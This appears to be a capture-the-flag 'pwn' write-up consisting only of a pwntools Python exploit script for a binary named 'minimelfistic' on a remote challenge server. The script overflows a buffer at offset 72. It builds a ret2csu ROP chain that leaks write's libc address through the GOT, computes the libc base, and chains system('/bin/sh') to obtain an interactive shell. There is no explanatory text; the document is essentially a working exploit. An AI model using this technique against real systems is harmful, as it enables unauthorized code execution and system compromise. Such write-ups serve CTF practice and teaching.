Tags: pwn
Rating:
### Author: Nima Dabbaghi
-----
```
#!/usr/bin/env python3
from pwn import *
elf = ELF("./minimelfistic", checksec=False)
libc = ELF("./libc.so.6", checksec=False)
#ld = ELF("./ld-2.27.so", checksec=False)
context.binary = elf
rop = ROP(elf)
context.log_level = "debug"
p = remote("134.209.186.58",30411)
# symbols
main = elf.sym.main
write_got = elf.got.write
write_plt = elf.plt.write
# gadgets
pop_rdi = 0x0000000000400a43
pop_rsi = 0x0000000000400a41
pop_csu = 0x00400a3a # pop rbx, rpb, r12,r13,r14,r15
mov_csu = 0x00400a20 # mov rdx, r15; rsi, r14; edi, r13d
ret = 0x0000000000400616
rop.raw(pop_rdi)
rop.raw(p64(1))
rop.ret2csu(1, elf.got.write, 8,1,1,1,1,1,1)
rop.raw(pop_rdi)
rop.raw(p64(1))
rop.call(elf.plt.write)
rop.call(elf.sym.main)
payload = flat({72:rop.chain()})
p.sendlineafter(b">", payload)
p.sendlineafter(b">", b"9")
p.recvline()
p.recvline()
p.recvline()
leak = u64(p.recv(6).ljust(8, b"\x00"))
info(f"Leaked libc @ {hex(leak)}")
libc.address = leak - libc.sym.write
success(f"Leaked Libc @ {hex(libc.address)}")
rop2 = ROP(libc)
binsh = next(libc.search(b"/bin/sh"))
rop2.raw(pop_rdi)
rop2.raw(binsh)
#rop2.raw(pack(0x0000000000400616))
rop2.raw(libc.sym.system)
payload2 = flat({72:rop2.chain()})
p.sendlineafter(b">", payload2)
p.sendlineafter(b">", b"9")
p.interactive()
```
